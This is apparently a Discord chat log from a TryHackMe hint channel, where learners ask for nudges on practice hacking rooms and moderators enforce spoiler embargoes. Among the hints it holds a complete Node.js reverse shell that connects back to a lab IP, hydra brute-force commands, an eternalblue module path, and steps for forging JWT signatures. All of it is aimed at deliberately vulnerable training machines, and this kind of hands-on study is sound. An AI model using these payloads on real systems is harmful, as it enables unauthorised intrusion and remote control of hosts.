#room-hints

Awesome!! I'm gonna be looking over all of the submitted write-ups on saturday 😄

(Edit: nvm)

nice @ashen marsh

Accepted your writeup, had some surprise free time today to look thru and it was great 😄

Great! thank you again great box keep them coming !

Cheers!!

okay so im doing the wreath room now i try to cat the id_rsa but its blank for some reason am i missing something

#wreath-network

Hi all, I'm at "Brainstorm", and I'm crashing the server to determine the offset, BUT I need to reboot the machine every time I crash it. Am I correct in bulldozing it? Or is there a better, "fancier", cleaner way to do it?

Run the binary in your own machine where you can inspect the registers?

Is that an option? The binary is Windows and I'm investigating on Kali, but I'll try to disassemble it, maybe I'm taking for granted that I can't do that

Yes. It's an option. Make a windows VM with the appropriate version and architecture.

Time to dust off my Flare VM right

anybody got any ideas?

can you open the image normally?

Ill see one sec

In my experience, that can mean steghide wants a password

how much of a hint do you want?

yep opens fine, and hmm maybe yeah, it prob does need a password

Can you tell me if it needs one or not?

I figure its password protected anyway

yup, I believe if you get the right password it will open successfully

sweet just gotta keep looking then

there's is an alternate method of getting access to the machine which doesn't require stego, have you enumerated the machine fully?

probably not, i want to keep trying for a little bit before getting more hints or looking at the writeup

ahh right, good luck with it!

if you need a pointer, ping me whenever 😃

thanks man! 🙂

hey guys im stuck on the last question of remux the tmux,

How can you run the desired plugin after loading it?

😄

uh

[prefix] + I I believe @harsh cove

I as in install

no spaces 😦

but if you add it to your tmux config, it'll be used every time

what's the actual question?

How can you run the desired plugin after loading it?

what do you mean "run"?

How would you load a plugin into a tmux config file?

set -g plugin
How can you run the desired plugin after loading it?

makes any sense ?

hi i'm doing "HA Joker CTF" room and i'm stuck at question 8

what should i do?
it says use burpsuite but why would i decode it to base64?
i tried brute-force the web page using hydra but it didn't work

Because it's http basic authentication. Hydra will work.

found it lol, it was run-shell

Hello, I'm looking for a hint in the Sysmon room, for the Task 10 question "What process was accessed by schtasks.exe that would be considered suspicious behavior in Investigation 3.2?" I can view the log and I see what happened, but I don't see anything that could fit in the format of the answer. I'm stumped!

boa noite galera

alguem que fala portugues aqui ?

Hi, please keep all conversation in English as per Rule 8

I don't speak english, I'm from Brazil, but I can translate

any Brazilian here ?

This channel is for hints on tryhackme rooms. Please use #general

I wanted a tip on a question that I'm not able to ask

Yes, there are brazilians here. A lot of then (us).

Hello, i need a hint in Crypt room task5, i tried to use hashid to find out the encryption of the hash. Founded bcrypt, but i am not able to decrypt it with John Reapper.

Can any one give me a direction?

There are a lot of rooms that could be Crypt room

What's the room title? What's the URL?

Hashing - Crypto 101 - https://tryhackme.com/room/hashingcrypto101

Sorry

Yes, that first one is bcrypt

John the ripper will work.

Use Rockyou as your wordlist.

i don't kow if i can post the command here, but i tried

-format=bcrypt --wordlist=<rockyou> <file hash>

and do not work

is anybody here familiar with the ignite box and can give me a hint what to do after i exploited the box and got the user.txt, i dont want to look up the write ups, i want just a keyword to look for...

Hello there, I am currently on the nmap room and can't seem to figure out the "general purpose of using NULL, FIN and Xmas." I mean I'm pretty sure I understand that it's for stealthiness beyond syn, but I can't quite figure out the answer they are looking for. Any hints would be greatly appreciated.

I'm in that room right now, just further down, lol. There are three states of packets, open, closed, and the other one. You want to get around the other one

heh, I focused too much on the word general, looked at the beginning, and didn't look at the end of the explanation closely enough. Thanks muchly!

can anyone help me with this `What form of authentication is password-based authentication?

`

"If you're having problems authenticating, check that you're escaping the '$'."

im trying to authenticate a user that ive added into the /etc/passwd

whenever i type in the password, it gives me a # then expects an input

oh i got it, it had to be /bin/bash

In the room password security ...
Any hint for Crypto ____ with age?

It's underneath the scrypt

oh got it
thanks

Hi. Did you get this to work? I'm having the same issue

yes, if you are looking bellow (after the message I wrote there) you will be able to see how I approached that. If you still have problems with that, let me know 😉

Thanks for replying. Yes, I did follow the thread. Which port did you end up using for the webserver and where exactly did you change the ports in the exploit?
Here's what mine looks like now

well, I am not sure you did modified the right thing in there. I am not sure that you added the port correctly.

so, first of all try to understand what that vbs variable is. I mean, use an URL decoder and see where you should add the port you want

for now, as it was mentioned when I asked, is going on the default http port, 80

try to decode it and add the port you want to listen to 😉 and you'll see where you will have to modify

also, if you still have problems with adding the port, look closer at my pictures (especially this one, where I have added the port) because you have my whole setup

Okay. I will try that. Thanks @jovial sentinel

no problem, mate. If you still have questions, drop them here 😉 I'm glad to help you

BadByte 0.5 im in and i cannot find a way to privesc anyone have any clues?

Do not provide or ask for help or hints for the VulnNet: Node room until 29th March, 7pm (GMT)

hello, can someone may explain me how to solve the question 3 of the task 5 of here? https://tryhackme.com/room/passwordsecurity im trying to understand it but i just cant and i already tried the hint to google and cant find nothing :S, i want to understand how to make the math right but just cant, tested all the possible solutions i found but all are wrong, feels like a dumb hehe

when you get the possible answer remember to round up to a whole number

yea, i did it but i think im doing something wrong there

the a-z+a-z is your first number, then you need to raise it your number of characters and multiple by 8 bytes, after that I used Google to convert to correct answer

Hi All, Noob here - Im doing OWASP-Juice-Shop Task 4 and running brute-force atk via burp. I'm using THM attackbox and its running for 30 mins w 323/5200. is this normal and how long will this takes to finish? or my box is slow?

Hi all, any hints for iso27001 task 2.4

If you get the ISO 27001 cert for
internal auditor, which types
of audits are you able to do?

there are 3 possible answers, although only one of them actually states it directly

Thanks, was trying a few different from research.

the community version of burp is rate limit throttled, so it goes incredibly slow (at least in my experience)

you could try use hydra to bruteforce it perhaps?

Hi, new user here having some trouble with activity 14 in https://tryhackme.com/room/furthernmap: i keep getting no-response on all of the ports, not getting any open ones for the 5000 port section.
The nmap command i'm using is sudo nmap -Pn -f -sS -p1-5000 -vv [machine_ip] -oN ./Desktop/nmap.txt

btw that command takes me about 15 minutes to even run, no joke

You could use the -T4 flag to speed up the ping scanning

hello, someone had this error b4 while trying to use spiderfoot?
Invalid target type. Could not recognize it as a target SpiderFoot supports
i followed the guide on the room https://tryhackme.com/room/somesint step by step and still cant search a simple name or nickname for the room

nvm fixed it just by using quotes to type it XDDDD i think i should sleep more and do less ctf's haha

Binary-related question: While debugging a program, the addresses are local, or are fixed across machines?

What I mean is, if a given function starts at 0xDEADBEEF, will it be the same if I run the same binary in another computer?

Put " before and after name or nickname.

any hint for boiler ctf? im still in the enumeration, apparently i need to find a file... checked the directories gobuster found, tried a dir traversal exploit for the cms and couldnt find it, what am i missing?

I'm not 100% sure, but I think it depends on how the program was written/developed.

nvm i figured it out

I didn't compile it haha so I guess it'll be trial and error

Has anyone solved easypeasy ctf room from tryhackme?I am stuck and need a nudge on how to enumerate for flag 2.

I have used more than 4 wordlists but still no clue

https://tryhackme.com/room/vulnversity im on task 2 and trying to figure out what the -n arg doesnt resolve. theres obviously a difference between nmap using the -O and -n args but i cant figure out what it wants as an answer

hey, have you found a fix? I'm also there getting the same thing

nvm, just figured it out

👍 thanks

Please be aware that VulnNet: Node is under an embargo
#room-hints message

Do not post spoilers on rooms on an embargo

My bad

Sorry

I m solving all in one room.Found a valid user for wp login .Trying bruteoforcing the password with woscan but its been over 45 no success yet.Does it really require bruteoforcing?

guys in the jack room the Privilege escalation is it ||Python library hijacking||

Yep, I believe it is IIRC

cool guess am doing the right thing

ok I might need some help on the linux fundamentals part 3 task 7 like I do not know what to start with

The question is:

We've been through a lot in this section, and the challenge for this binary will reflect that. The first step is actually finding the binary, I'm not heartless though, so I'll give you the name of the binary. The name of the binary is shiba4.

The actual binary will check for two things, it will be checking that there's a directory called test in your home directory, how you create that is up to you. It will also be checking that inside the directory there's a file called test1234.

and "open shiba4" doesn’t work

and "open shiba4" doesn’t work why would it work?

The first step is actually finding the binary The room tells you the first step. Perhaps find might be useful?

ohh yea there is a whole task on find

I try this but it does not work: find /shiab4 but it still says no such file or dirrectory

That is not how you use find, so yeah that won't work

You're currently trying to look in /shiba4 for all files

ok how can you make spoiler text again?

like so if I got it right to not spoil it to everyone

nvm

||I typed: find /tmp shiba4" but lot's of things popedup and says access denied and no such der or file||

That's also not quite right.

You're now listing files in /tmp AND in shiba4 within the current directory

I recommend going back to the find section and re-reading how to find files with a specific name, because that very much isn't how to do that

because I red the section on "find" like two times but there is only 3 commands that it show:

1. find /
2. find dir -user
3. find dir -group

but it is not a user neither a group that I am searching for

Ok so maybe you need to keep looking. The internet is great.

yes yes you are right 👍

so would linux commands work with puTTY?

PuTTY is a client for a bunch of different protocols. PuTTY can talk SSH, which you're using here. SSH isn't just for Linux.

ok I get it

ok so I need to finding a binary in a file called "shiba4"

grep doesn't work either

No.

You don't.

it said that on stackoverflow

You need to find a binary called shiba4. A binary is a type of file.

so I need the file command and the find command

No.

You only need the find command

so do I need one of those commands

in find

a site tells me to do all of this:

$ file /bin/ls. ...
$ ldd /bin/ls. ...
$ ltrace ls. ...
$ hexdump -C /bin/ls | head. ...
$ readelf -h /bin/ls. ...
$ objdump -d /bin/ls | head. ...
$ strace -f /bin/ls. ...
$ cat hello.c.

but no find

im doing linuxstrengthtraining , i've found a chat log saying there is a backup file created hours ago from the chat log time which is 16:05
how can i find only files before 16:05
find / -type f -newermt '2020-08-13 16:05' 2> /dev/null
is what i've used but no luck i get tun of files that i dont wanna loop through
and the date of that file created is 2020-08-13\

-ban @white salmon Server invite pyramid scheme scam

🔨 Banned Bunnybunny_0922#8103 indefinitely

hey has anyone done pylon yet

that room got taken down

its still up im on it right now

shouldnt be

im stuck on wreath question 38 can i pm someone ?

#wreath-network

Hi, stuck with Atractive Directory room. Can't connect with smb client:

to map remote SMB shares worked...

directory: OK
smb password: OK
smb username: OK
ip pingable

solved

Hi guys..
M doing mindgames room.. able to decode the code but need some hints for next steps..

So, can you work out how it works?

If you can decode it, I think you should quite quickly be able to turn that into being able to run your own code

Yeah... I got that decoder type... But when I try to run shell command not accepting

Able to do print like simple commands not other commands

There's no restrictions on it

No filters or anything

Just some encoders are poorly implemented and don't work right.

Program Output:

File "<string>", line 1
import os os.system("ls")
^
SyntaxError: invalid syntax

getting above kind of error when trying to execute system related commands

Just some encoders are poorly implemented and don't work right.

Like that 100% looks like an encoder breaking

Already tried few encoders... Lemme check few more envody

*encoders

Like the second one on google for me works

But dcode.fr doesn't

in the owasp juice shop room when brute forcing the admin accounts password about how quickly should you get the correct password because its been trying for almost 2 hours and i haven't gotten the correct one yet so im assuming i did something wrong?

yeah... same... dcode.fr didnt worked... second one got worked... thanks... 🙂

Hi, can i get a nudge on VulnNet2 Node Training's room, got the shell, but i'm stuck on lateral privilege(i know what i can do but didn't work)

nvm i figured it out

Do not provide or ask for help or hints for the SafeZone room until 31st March, 7pm (GMT)

nobody to give me a nudge on vulnNet2 ?

I think that one is still under embargo

Hi folks, I'm working the Network Services 2 Exploiting NFS section and am having an issue. I exploited the server to ssh into it. I download the bash executable, and permission it accordingly, but when I run it, a fault occurs:

./bash: line 7: syntax error near unexpected token `newline'
./bash: line 7: `<!DOCTYPE html>'

So the question is: is this a fault in the room or do I get another bash executable?

!docs verify

Verify with the bot

Then you can post images

"<!DOCTYPE html>"...

You downloaded the webpage, rather than the binary

@white salmon @stuck fractal Oh geez. Yea, I 'wget' the file. That was dumb. Thanks I'll work on just getting the raw data.

@white salmon @stuck fractal Thanks folks. That was it. I appreciate the help.

Anyone complete the Web Fundamentals mini CTF? I am stuck on the second question for the POST flag. I am getting the following error: "You need the right request body"

My Curl command is: curl -d "data=flag_please" http://10.10.109.48:8081/ctf/post

data= is that the correct name?

The task instructions are: "POST request. Make a POST request with the body "flag_please" to /ctf/post"

Yeah.

So your body, right now, is data=flag_please

That's not quite right

I also tried body=

Why are you specifying anything=

You're not told a variable name, because it's not asking for one

It's asking for the body

Not a parameter = flag_please

The setup talks about using --data with POST

Yeah.

It doesn't tell you to set a parameter.

I made the room, I know precisely what the backend is looking for here.

Can you help me understand how you'd add the "flag_please" in the body of a post request?

why not try -d "flag_please"?

I thought I tried that, let me try it again

Thanks for your help! I'll have to look through my bash history. I thought I tried that. There must of been a typo on my part some place!

so im doing the hydra room (ik havent done it yet wow) but im wondering why ||"hydra -l molly -P rockyou.txt 10.10.252.223 http-post-form “/:login:username=^USER^&password=^PASS^:incorrect” -V" ||
isnt working

That format is totally broken

Should be three parts, seperated with :

You have 4

ok thx

btw im also getting "File for password not found: "rockyou.txt" "

and im in the kali vm

Ok. Because you need to supply a path to it

It's not in your current directory, so you need to specify a path for it

wow im an idiot sorry ok thx

same issue

its not working!

@heady laurel @cedar axle That room is under embargo still.

!rule 13

Rule 13: When asking for help/tech support please perform research to your fullest ability and don't spam the chat if you don't get an answer to your question immediately. Mods and Community Mentors have the right to refuse helping those who have not done troubleshooting/research on their own first. Clearly phrase your questions as we (fortunately for all parties involved) cannot read your mind. Please include the room, task, and question number in your question if possible.

Although we are a learning platform, we politely ask that you respect the competitive nature of newly released challenges. As such, no hints for new challenge boxes should be given immediately after a release (72 hours, by default), unless instructed otherwise by the content creator.

my bad, apologies

I m solving jack-of-all room from tryhack.i got the intial foothold and also found a password list which is encrypted.But I cant crack it.

You sure you need to crack anything?

Tried using those as passwords in a brute force?

Anyone completed safezone1?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.

I am stuck in safezone1 room in enumerating stage I have tried nmap and gobuster there is a login page which have 3 attempts of login.

Oh and btw its a new room so no hints/help are provided till 31st March, 7pm (GMT).

Ok

hello, i am doing the /steelmountain room at task 2 question 3. the question is what it the CVE number for the exploit.

i have run nmap --script vuln. and i got 2x cve numbers out of that

but non of them work

does someone have a hint to where i should look next?

Hello, I am doing the section "ZTH: Obscure Web Vulns" but I got completely stuck with the challenge "Task14: Section 3 JWT: challenge". I follow everything that is explained in task11/12 but always getting "try again" on the website. I know there is an expiration time but I did it a lot of times already but still getting rejected. So I think I am doing something wrong here. these are the steps I take

• check if the JWT has algorithm HS256 by pasting it into https://jwt.io/ (if not, change it: i use https://www.base64decode.org/ to encode/decode , encoding with URL-safe encoding Base64URL format)
• get the public.pem from the website and convert it to hex
• use openssl to sign header and payload without signature : echo -n "<HS256 header>.<unchanged payload>" | openssl dgst -sha256 -mac HMAC -macopt hexkey:<hex public key from previous step>
• decode the hex signature in previous step to binary and reencode is in base64: python -c "exec("import base64, binascii\nprint base64.urlsafe_b64encode(binascii.a2b_hex('<signature previous step>')).replace('=','')")"
• use this result as the signature as follows (using jwt.io again by pasting the signature from previous step into "verify signature" field "your 256bit secret"): <HS256 header>.<unchanged payload>.<decoded signature previous step>
• site says: try again
  thank you for the help, I dunno what I am doing wrong here.

pylon can get hint?

I did this room today, you need be incredibly fast other JWT expires

it worked without cracking them

Yeah, because they weren't hashed

I though maybe they were my bad

That's why I hinted that they weren't.

Has anyone solved team?I am struggling with enumeration part.Did a lot of directory bruteforcing but no success.need a nudge

yeah next time onwards I will first try to use it if it happens in some other room

Smbmap -H ip does not show input any suggestions?

I’m on Ubuntu

Screenshot

That is not a screenshot.

Hm

I can ss but I’d have to install discord on pc

Wait

: an image that shows the contents of a computer display

😳

Anyways I’ve fixed it I just reinstalled smb

How is that helpful..?

Technically a picture of a screen not captured by the computer is also a screenshot, regarding
> That is not a screenshot.

Anyways, nevermind I think

I think you knew what he meant...

Let's just abandon that topic, since it is already resolved. Sorry

Yes, indeed.
Please try not cause problems in the help chats though -- doesn't really benefit anyone 🙂

Ok, so the things I do are correct ? It's just the speed? Any idea how fast you have to be?

There's some automated tools in that task, check them out

@inland onyx hi muir! doing wreath 🙂 .... can I dm you with a question?

Of course! Go for it 🙂

Hi I'm in room UploadVulns on Task 8, just looking for a push in the right direction

I think i'm looking in the right place? p sure this photo shows the accepted file types, and by trying they did work.

hi, can i get a nudge on pylon room?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

As another note, that room is currently private so I'm not sure how many people will be able to help you.

@stuck fractal ???

You asked for a nudge.

No one can provide you with a useful nudge if they don't know what part you need a nudge with

ah okay, sorry, i need a nudge on the pylon's flag 1...

What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done

There's a reason the questions are there. They're bits of information that people neeeeeeed in order to give you a useful hint

oh is pylon back out now?

very niiiice

I extracted the text from the image, but I'm stuck figuring out what exact encoding or a combination of encoding

Same

Hi! Somebody had problems with the room "intro to x86-64"..the last task is necessary put the respective password of 10 characters I have the answer (I guess is the correct) and the program don't gave the flag..only say "Password Correct"

So in the task I type again the password and don't acept this

I found CyberChef to be helpful

Hum i used another tool

Hey, I'm on the network services room, I've done the SMB section of the exploit, trying to get the right username to ssh into the polosmb3 machine, and i'm drawing a blank

I got it... last name as username... doh

same

I'm having troubles to understand what is being asked in linux modules room at task 7 when it ask "what did she sed?"
P.D: I have got the answer but I don't know why it is the answer, I'm not native English speaker

im currently in that same room lol. how did you figure out to use the last name?

also i got the id_rsa file but not sure how to use it for ssh

If you look in id_rsa.pub, at the end, it gives you the user@host that the key was generated on

ah thanks, i did download the pub file but didnt occur to me to open it

That user@host doesn't always correspond to the user and hostname of the system you're using it on

Just the system it was generated on

anybody done pylon root? i dont thing it is possible to get root even tried official path of root privesc but box get crashed everytime

its definitely possible, cant say for sure what is going wrong for you

listening on [any] 4141 ...
connect to [10.9.155.125] from (UNKNOWN) [10.10.241.111] 55422
root@pylon:/home/lone#``` yes it is possible i get the call back but it immediately died and even tried official writeup technique after tired of everything but still nothing work

as soon as run the config, box crash

dm me.

Apoligies to anyone who has / had trouble completing this room, i think i got a little ambitious, worked fine in testing 🤷‍♂️

i think u r right the problem is with resources coz of the free server, i dont found any other problem, nm

more resources have been approved, not sure how long it will take before it comes into effect

not even sure if thats the problem, might be a routing issue

If a password hash starts with $6$, what format is it !

I'm searching it from yesterday

sha512 off the top of my head

Andy what I'm getting just! SHA512

sha512crypt

I have try this

No wait thank you

https://hashcat.net/wiki/doku.php?id=example_hashes

Wow thank you 😭😭😭

Room: Relevant

Hello. I am doing the Relevant room. I got in, I managed to get a reverse shell and got the user flag but I don't know what to do next. I tried winPEAS and got nothing. Ok, almost nothing, I got that CredentialGuard is not enabled. This is the only thing that got my attention. Any hints on what to do for some privesc?

take a look at the output of winPEAS again, especially the privileges the user has (whoami /priv) see if you can find anything odd there

Great. So winPEAS is not a dead end. I will do that. Thanks.

Do not just give answers for room questions.

is there any video available for vulnerability part?

has anyone done vulnnet node?

I've created the payload, encoded to base64, sent as cookie but still no reverse shell

This is the payload I'm enocoding

||message: ||

any hint on safe zone?

That room is still under help and hints embargo, as per Rule 13.

Sorry, I didnt know that 🙂

now I see, 72 hours rule..

hi guys, I need help for the room Simple CTF, somone can help me ?

which question

the third one : What's the CVE you're using against the application?

I've looking for in exploit-db but ... nothing work

you are looking at the cms, correct

what do you mean by CMS ? the soft which use the protocol ?

I really need help on this one ... I don't know what I am doing wrong here

CMS is a webapp generally, something like Wordpress or Joomla is a CMS. A way of building and managing webapps

ok, i'm in the wrong way, thx

I was looking for somthing around the port which was focus in the second question

I need more practice, thx guys

Do not provide or ask for help or hints for the Debug room until 2nd April, 7pm (GMT)

alright so after a whole evening of headaches, turns out that changing my VPN Server fixed it. Switched from EU-VIP 2 to EU-VIP 1 and that did the trick. In case that helps. Cheers

hey guys I'm in the owasp top 10 romm but i got stock in this question from task 5. could someone help me? I don't know what to do

stuck*

i don't have my notes in front of me, but I think a gobuster scan might help with that

sure? the preovious room talk about burp suite

no, not sure. I don't have my notes at the moment

oh thanks by the way

no problem

sorry I couldn't be more helpful

don't worry

you can use a tool called dirsearch from github
some built in tools dont take ip adresses

https://github.com/maurosoria/dirsearch

Hello guys I am stuck in this room --How websites work

into html injection

https://cdn.discordapp.com/attachments/826690359803117610/826691727431696384/Screenshot_47.png

this one

i need help on back pen-testing

how can i use brute-forcing to find the username & password ?

You can't always enumerate usernames by bruteforcing tho

done

thanxx

Anyone doing Debug room

👻

Oh shoot no hints or anything u til 7PM

Ma bad

Has anyone done How websites work room in Complete Beginner????

yea

me

Want some help?

I am stuck in the HTML injection question

K

wait a sec

Ok

did you search for creating an html link in google?

Well I had the same problem

But what might help is refreshing the page

Cuz If you made some changes already it might not work

I couldn’t understand it in stack overflow

<a> tags with attributes

<a href="url"></a>

yes

Just that?

Try refreshing and doing it like that

yup

yeah

Yes wait

just make sure that url is the actual url to hacker.com

you should add "http://" or "https://" before the "hacker.com"

Hope it works for you 🙂

It worked but the link says we cannot connect to hacker.com

Well, what did you write?

Like in the textbox

And what link?

You should only type <a href="//url to hacker.com"></a> and it should work 😄

<a href="//url to hacker.com">button tag in between </a>

This I wrote

You should only type in <a href="//url to hacker.com"></a>

It gives you a JS alert

and there is the answer

Is it fine now?

I wrote like this

bruh

write it in the texbox

wait a sec

I'll show you

contact me privately cuz i dont want to share it with others (it's be too easy to cheat for them) 🙂

Ok

I wrote it slightly different but the result is the same

I enjoyed the new room.... haven’t used HTML in such a long time and it was fun to use it again 😊

I have a problem now lol

Can anyone help?

Please ask your question directly.
People don't know if they can help unless they know the question.

Ok sorry

I don't know how to connect to the overwrite.uploadvulns.thm in Upload Vulnerabilities room...

Put that in the address bar of your browser.

As long as you added it to /etc/hosts correctly as the room tells you to, it will work

Well, I copied the command to admin powershell

and it still doesn't work 😦

Urgh windows.

I hate win

Hacking from Windows isn't really a good idea unless you're already confident with hacking.

yesterday I had to reset my whole pc

Use the attack box or make a kali VM. Connect to the VPN from that kali VM.

I can deploy my kali vm

Use that.

I can use in-browser attackbox?

The room is pretty much entirely written for Linux users, like most rooms will be.

*for this room

That was one of the options I suggested, so yes.

So deploy attackbox and then type the linux command that was given in task 1?

still not working 😦

can anyone help with vulnet: node room, i got reverse shell but stuck on priv esc for user. i found what i most likely need to use but not sure how to leverage it.

why i'm not able to send ss in this groupe

you need verify

!docs verify

@craggy ledge Did you check the 'usual' privesc ways? There should be an obvious way to escalate to user

Take care not to spoil too much when you get the answer

srry

Just say you're sorted @versed solstice

ight

Room: Steal Mountain
Task: 4
how do i debug this?? i search about it and found out that it was merged with urllib in python3 so i tried removing 2 at the end then, it printed out error in the exception case

are you sure it is a python3 script

no its python2

urllib2 is a python2 library, python3 has a different one iirc but you would have to adapt the script to python3 then

i tried with python 2 but still got the same error

you would need to install that library then using pip

tried that too got another error

your default for python is probably mapped to python3

so even if i run it with python 2 it will run in python3

how do i change it?

put in python2 -m pip

python2 script.py

ahh i made a mistake

yup this worked

the normal python script.py doesnt mean python2?

python now maps to python3 on many distros

Python2 is deprecated

oh so that's why my python 2 server isnt working. I just tried python2 -m SimpleHTTPServer 8000 and it worked

thank you @stuck fractal @glacial gust

Swap to python3 -m http.Server

Might be http.server

But the python3 version, you should swap to

yeah I started using python3 server after that error

Any hints on safezone?

Any nudge on glitch?

That's a brand new room, and as such falls under the 72 hour help and hints embargo as part of rule 13

Do not provide or ask for help or hints for the Glitch room until 3rd April, 7pm (GMT)

I am very sorry, I was not aware of this, where can I see the release date of a box?

#announcements for one

Any hint on safe zone?

#room-hints is here for people who want a "pointer" towards the room they are completing, and not necessarily a spoiler. As such, when asking a question, be sure to include:

• What room you are on
• At what stage are you stuck exactly? Enumerating? Exploiting? Priv esc?
• What techniques / tools have you tried so far? Just so that we know how to hint you in the right direction without repeating what you've already done.

Upload vulnerabilities room, jewel challenge, ive done everything now all i have to is activate the reverse shell

but when i try running it in admin page it says module does not exist

no matter what i try

../content/FFS.jpg

./content/FFS.jpg

/content/FFFS.jpg

all of them dont work

There was a section that shiba3 wanted the password for, I couldn't find the basics in linux 2, can you help me.

you can find it

try harder

ok

finally found it

someone throw me some hints for safezone please, struggling to get foothold

try something Windows like

stickies

@orchid root please remember rule 13, specifically the 72 hour embargo for help and hints on new rooms

Ook! I will remember this

how can i share screenshots?

i'm in blue room

and im not able to exploit it!

need to verify with the bot

exploit/windows/smb/ms17_010_eternalblue

where?

the tryhackme bot

what shoul i write

to bot

dm the bot and it will tell you what to do

!docs verify

!docs verify

No need to repeat it @tired lantern

ok

I appear to have hit a brick wall and I hope someone can point me in the right direction. I'm also a complete beginner so please be gentle.

I am working on the "ccpentesting" room, I'm on Task 8 (Metasploit) and the current question is "What options sets the architecture to be exploited?"

I've loaded the eternalblue exploit as instructed. I've checked out the options and the advanced options, but I can't find anything about architecture. The closest thing I can find is the VERIFY_ARCH option which checks against my "Exploit target" but I can't out how to change this target and, even if I could, info suggests it's the only available target.

Is this because I've got msf6 and the room is designed for msf5?

it should work with either

I was able to guess the answer but I'd like to know how to see it in the options. And if I wanted to set it, it may not work.

It will work with either. For CC Pentesting you're not meant to use eternalblue?

Once you have found the module for the specific machine that you want to exploit, you need to select it and set the proper options. This task will take you through selecting and setting options for one of the most popular metasploit modules "eternalblue". All basic commands that could be run before selecting a module can also be done while a module is selected.

Huh, ok

That's not the one you end up using

Yeah I'm on that final task now and using exploit/multi/http/nostromo_code_exec

I'm encountering another error where the exploit is deployed but no session is created. Googling suggests this is an issue with my msf

Currently updating.

I'm not getting any reply from bot

Probably an incorrect LHOST

#site-support

Why it's not working?

Thanks. But I'm using my tun0 address.

This has been a blessing in disguise. I figured out how to enable verbose logging, saw a message that the RHOST on port 80 refused the connection and then used nmap to see that it wasn't listening on port 80. So I'm redeploying the machine... fingers crossed.

Is this a problem with the machine? The instructions state that the machine is vulnerable on port 80 but even this new deployment says port 80 is closed.

any hints on safezone?

I have tried
||XSS when creating a user
LFI using ?page=
guessing the password for admin
tried chainging PHPSESSID||

Thanks @winged crag , got it.

any hints for tryhackme-->web fundamentals-->how websites work(room)-->HTML injection(Task 5)

Enumerate ||with bigger wordlists when looking for hidden directories||

Any hint on safezone privesc? || I am at the user files, need to go to user yash: i've triedrivesc with mysql root credentials, looked at crontabs, and run linpeas and found nothing. Also the mysql database has nothing useful||

Just so i know, is there an actual directory? or did i miss a file maybe? I have already found ||note.txt|| Thanks either way

Yep there is a ||directory|| you haven't found yet

okay, ty ty!

i just realised it was something i hadn't tried, i'd tried combos, then eventually thought some people just go by surnames

hint on safezone room

after finding page get parameter in source code

tried all lfi methods

none are working idk why

You are probably not who you need to be. Earlier hint just above is relevant.

I m stuck in Gotta Catch'em All! room.Need a nudge on enumeration part.Reviewing the page source told me to examine the console but got nothing except a few pokemon names.Thanks ina dvance

which wordlist are you talking about? big.txt?

I've used SecLists's raft large directories

At the end of Ice it suggests trying to use a manual exploit instead of metasploit. This appears to be a huge leap as I've opened the exploit-db page but have no idea what to do. I downloaded 568.c but what can I do with it?

nah there's no hidden directory

can you please name it?

in dm

Hi. Anyone working on the glitch room? Have reached a dead endweary

That room is still under help and hints embargo as part of rule 13.

Ah ok. Sorry my bad

hello can you some one give me hints in room "glitch" i found "token='this_is_not_real'" so when i put it in the box coockie trned me on to the page "sad." . but the problem it i not found anything in that page i can take exploit him

no one her ????

There is a hidden directory, just try one of the raft lists from seclists

See the pinned messages regarding the room glitch

@hexed crescent oooh thank you so match

hello, can anyone help me with the blue room: https://tryhackme.com/room/blue

Even following the video, the metasploit is unable to establish a connection, is always failing.

I re started the machine at least 5 times

show your options

i just set the RHOSTS

the last try i changed the LPORT too

I am not a pro but your LPORT LHOST is not right. It should be your tun0

Try this command and put in that ip
ip a | grep tun0

or
ip a s tun0

LHOST. LPORT is fine.

oops. Yeah, my bad 😄 Still, that command should help him 🤭

Could I get a tiny hint on jewel in uploadvulns? I don't want to google
it and get totally spoiled.

|| I've managed to upload my nodejs revshell and I know where it is. I've
found the /admin page and I know that should probably execute my
revshell from there with something along the lines of "activate
../content/XXX.jpg".
I also know the /var/www/html nodejs looks like
/var/www/html/node_modules/express/lib/rout..."" but I can
t figure out what I should do next.||

Maybe I should also add the this is the first time I'm dealing with
node ever. Any small pointer on how to proceed would be highly appreciated.

i give up for this room, no hints would help. The machine maybe has been updated and the vuln has been corrected.

||alright I got impatient and had a look at the linked hints.
it seems I was somewhat correct, I should run "../content/XXX.jpg" in the
admin page. but I still get no response with nc -lvnp 1234 and I get
the response "Module does not exist" on the webpage.
I'm using this revshell:
magic number here
(function(){
var net = require("net"),
cp = require("child_process"),
sh = cp.spawn("/bin/sh", []);
var client = new net.Socket();
client.connect(1234, "10.9.5.199", function(){
client.pipe(sh.stdin);
sh.stdout.pipe(client);
sh.stderr.pipe(client);
});
return /a/; // Prevents the Node.js application form crashing
})();||

Someone's said the magic number isn't needed because it's just clientside?

@inland onyx more and more people are giving up or complaining that it's broken

Magic number is not needed because that filter is client side

Adding a magic number there will break it

thank you!

@inland onyx I tried both magic and no magic and it failed

I did the uploadvulns room about a week or so ago, and everything was working. My biggest issue was that I'd put the file headers/magic numbers in the .js/.jpg reverse shell, which made it not executable as js code

I think that 'module not found' might be a generic error that also includes 'this isn't actually a valid module', but my memory is a little rusty on it

hey guys i am new to tryhackme

and i was doing this BOOKSTORE room i can't figure out how to do enum on this http site

i ve tried looking for version related exploits

and did directory busting but no luck

i even tried bruteforcing with default credentials but still couldn't break the ice

any hint would be highly appreciated pls help

so I did https://tryhackme.com/room/basicpentestingjt
i logged in as ||kay|| with ||the stolen id_rsa from jan|| and privesced to root

I used ||lxd privesc|| and set suid on /bin/bash with that to have it easier

/root/flag.txt said that there is a second way to privesc

I couldn't find it. there are a couple things for the kernel version i found in searchsploit, but none of the POCs there seemed promising. I tried a few anyway and they all faulted, failed or gave me "permission denied"

also i had trouble with the ||smb user enumeration|| with nmap. it just didn't give me any ouput while gobuster was running. maybe the connection was saturated? when I ran it later it worked just fine. was really annoying stumbling around forever

Do not provide or ask for help or hints for the USTOUN room until 5th April, 7pm (GMT)

nevermind... you can just ||sudo with kay using the password from the flag||...

and i do all that stuff xD well, good practice anyway

but i really should be paying more attention to the basics

